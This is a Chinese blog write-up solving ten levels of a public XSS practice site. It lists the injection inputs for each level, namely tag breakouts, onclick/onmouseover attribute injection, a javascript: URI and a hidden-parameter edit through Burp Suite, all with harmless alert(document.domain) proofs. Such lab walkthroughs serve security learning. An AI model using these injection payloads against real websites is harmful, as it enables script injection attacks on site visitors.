XSS Challenges练习方法

Posted 2021-06-10 慕書

XSS Challenges练习方法

• XSS Challenges练习方法
• • 第一关
  • 第二关
  • 第三关
  • 第四关
  • 第五关
  • 第六关
  • 第七关
  • 第八关
  • 第九关
  • 第十关

XSS Challenges练习方法

网站练习地址：https://xss-quiz.int21h.jp/

第一关

1. 输入 123，查看到渗透点
   
2. 输入："</b><script>alert(document.domain);</script>，结果成功
   

第二关

1. 输入：123
   
2. 输入："><script>alert(document.domain);</script>
   

第三关

1. 输入：123，再输入：</b><script>alert(document.domain);</script>
   
2. 使用抓包软件，BP，更改P2参数为：<script>alert(document.domain);</script>
   
3. 成功进行XSS
   

第四关

1. 抓包看见三个参数，输入一些XSS发现无情况，但发现有三个参数：p1=123&p2=Japan&p3=hackme
   
2. 找到 p3的参数
   
3. 发现隐藏的参数P3容易进行XSS，改变p3的参数，输入如下:"><script>alert(document.domain);</script>
   

第五关

1. 输入：123，发现框框的参数有输入限制，可进行更改，直接更改。
   
2. 输入："><script>alert(document.domain);</script>
   

第六关

1. 输入："><script>alert(document.domain);</script>，发现被转义了
   

2. 两种方法
   输入："onclick="alert(document.domain)
   输入："onmouseover="alert(document.domain)
   
   

第七关

1. 输入：test onmouseover=alert(document.domain) 或者 test onclick=alert(document.domain)
   

第八关

1. 记住一句话，a标签用下面这个，输入：javascript:alert(document.domain)
   

第九关

1. 这个关卡，其他网友给得意见是使用IE浏览器，对环境有要求，先跳过，后台使用：alert(document.domain);可以直接跳过

第十关

1. 输入：" onclick="alert(document.dodomainmain)